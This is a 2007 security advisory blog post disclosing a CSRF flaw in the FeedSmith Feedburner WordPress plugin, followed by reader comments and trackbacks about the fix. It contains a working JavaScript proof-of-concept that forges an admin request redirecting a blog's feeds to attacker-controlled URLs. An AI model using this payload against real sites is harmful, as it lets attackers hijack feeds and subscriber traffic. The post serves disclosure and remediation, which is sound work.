Hijacking feeds with Feedburner Vulnerability
Filed Under (Advisories, WordPress) by DK on 2 October 2007

The famour Feedsmith Feedburner plugin is vulnerable to a CSRF attack that can allow an attacker to completely hijack blog feeds.

The popular feed service plugin page says this:

This plugin makes it easy to redirect 100% of traffic for your feeds to a FeedBurner feed you have created. FeedBurner can then track all of your feed subscriber traffic and usage and apply a variety of features you choose to improve and enhance your original WordPress feed.

In other words, if an attacker can control the Feedburner plugin, it means 100% of traffic will be hijacked…. [and] can then be used to track all [hijacked] subscriber traffic and usage…


feedburner csrf vulnerability

Proof of concept



// Simple Proof of Concept Exploit for FeedSmith Feedburner CSRF Hijacking
// Tested on version 2.2.

t='http://the-target/wordpress/wp-admin/options-general.php?
    page=FeedBurner_FeedSmith_Plugin.php';

p='redirect=true&feedburner_url=http://hijacking-your-feed.com/with/new/feed&
    feedburner_comments_url=http://hijacking-your-comments.com/with/new/feed';

feedburner_csrf = function(t, p) {

        req = new XMLHttpRequest();
        var url = t;
        var params = p;
        req.open("POST", url);

        req.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        req.setRequestHeader("Content-length", params.length);
        req.setRequestHeader("Connection", "close");
        req.send(params);

};

feedburner_csrf(t,p);

Solution:

Some time ago I released a whitepaper detailing some common WordPress plugin security pitfalls. To resolve the issue, Feedburner need to apply the WP Nonce as explained in this paper.

Google have already gotten back to me and a fix will be available shortly.

Update: 03/10/07: Fixed version released.

   
Enjoy the article? Please take a second to: Digg it! | StumbleUpon it!

Read and Contribute to BlogSec News!

Comments

Marcin on 2 October, 2007 at 8:32 am #

I know of another way to mitigate/reduce the likelihood of exploitation. I would rather keep it private (hasn’t been verified to work), so Adrian, if you can, send me an email.


imjuk on 2 October, 2007 at 1:53 pm #

good catch on this. looks like a significant exploit in Feedburner. Am away to alter some of my posts on feedburner in light of this info.
Cheers
Mike


David Kierznowski on 2 October, 2007 at 3:17 pm #

Marcin, not sharing eh? :)

imjuk, from what I understand, the fix should be available any day.


CMP2.NET Design Multimedia Internet Security » Sayfa » Feedburner’da Güvenlik Açığı on 3 October, 2007 at 6:34 am #

[…] http://blogsecurity.net/wordpress/feedburner-feed-hijacking/trackback/ […]


BlogSecurity » Feedsmith Feedburner vulnerability fixed on 3 October, 2007 at 7:15 am #

[…] This does address the vulnerability released on BlogSecurity yesterday. […]


CMP2.NET Design Multimedia Internet Security » Sayfa » Feedburner Güvenlik Açığı Kapatıldı on 3 October, 2007 at 1:18 pm #

[…] versiyonunu yayınlayaraksayfamızda bahsettiğimiz güvenlik açığını kapatmış.Feedburner BlogSecurity‘de yayınlanan haberden sonra CSRF açığını kapatarak tekrar hizmet vermye […]


FeedSmith Plugin 2.3 - Upgrade Now! at WordPress Themes, Plugins, Blog Tips, Make Money Online >> WPthemesplugin.com on 4 October, 2007 at 9:21 am #

[…] to BlogSecurity version 2.2 is prone to CSRF (Cross-site request forgery) attack that can allow an attacker to […]


Warning! Warning! Danger! Danger! FeedSmith users on 4 October, 2007 at 11:51 pm #

[…] to Burning Question this potential security problem was brough to their attention by this post from Blog Security, Kudos to the Blog […]


Actualización de seguridad del plugin FeedBurner FeedSmith on 5 October, 2007 at 7:01 am #

[…] a Blog Security y FeedBurner […]


FeedBurner FeedSmith Security Update: WP 2.3 Fails to Notify on 10 October, 2007 at 7:57 pm #

[…] reports of Hijacking feeds with Feedburner Vulnerability, the new release v2.3 ensures that the only person who may change […]


BlogSecurity » Blog Archive » Feedburner: Show me the Money on 18 October, 2007 at 4:51 pm #

[…] of thousands of other blogs use the Feedburner service. A couple of weeks ago we released a vulnerability in Feedburner which allowed attackers to hijack your feed - this has since been resolved. Today, we will be […]


The FeedSmith Plugin: newly fortified as part of this delicious breakfast | Gaming and Sports Betting Tips on 20 October, 2007 at 10:27 am #

[…] like to thank Blog Security for their recent writeup of this potential exploit. Software is […]


AskApache on 24 October, 2007 at 5:44 am #

Great discovery! I’ve implemented the wp_nonce in all my plugins thanks to your security article you mentioned. I think its smart to use as few plugins as possible.. I like to rely on Apache mod_rewrite to redirect the feeds instead.


Topical Information for Consumers - Browse, Research, Buy » Blog Archive » The FeedSmith Plugin: newly fortified as part of this delicious breakfast on 25 November, 2007 at 8:30 am #

[…] like to thank Blog Security for their recent writeup of this potential exploit. Software is […]


perantau.com » The FeedSmith Plugin: newly fortified as part of this delicious breakfast on 27 November, 2007 at 3:44 pm #

[…] like to thank Blog Security for their recent writeup of this potential exploit. Software is […]


Feedburner Güvenlik açığı on 28 December, 2007 at 6:47 pm #

[…] rsslerinizi hijack yapabiliyorlar. BlogSecurity‘de yayınlanan haberden sonra CSRF açığını kapatarak tekrar hizmet vermye […]


ITlabs » Blog Archive » The FeedSmith Plugin: newly fortified as part of this delicious breakfast on 2 January, 2008 at 7:18 pm #

[…] like to thank Blog Security for their recent writeup of this potential exploit. Software is […]


The FeedSmith Plugin: newly fortified as part of this delicious breakfast | rajabugil|cewek bugil|gadis bugil on 6 February, 2008 at 4:15 pm #

[…] like to thank Blog Security for their recent writeup of this potential exploit. Software is […]


Il plugin Feedsmith di Feedburner contiene una falla, aggiornatelo all’ultima versione! | MondoBlog on 3 March, 2008 at 11:32 pm #

[…] il celebre plugin per Wordpress messo a disposizione da FeedBurner è stato crackato a causa di una vulnerabilità e tutti coloro che lo usano per effettuare il redirect dei loro feed RSS verso FeedBurner rischiano […]


The FeedSmith Plugin: newly fortified as part of this delicious breakfast | Arayıpta Bulamadığınız Herşey on 9 March, 2008 at 4:17 pm #

[…] like to thank Blog Security for their recent writeup of this potential exploit. Software is […]


The FeedSmith Plugin: newly fortified as part of this delicious breakfast | Guide for Online Marketing on 11 March, 2008 at 1:03 am #

[…] like to thank Blog Security for their recent writeup of this potential exploit. Software is […]


The FeedSmith Plugin: newly fortified as part of this delicious breakfast | Aggregator on 17 April, 2008 at 9:18 am #

[…] like to thank Blog Security for their recent writeup of this potential exploit. Software is […]


Comment
Name:
Email:
Website:
Message: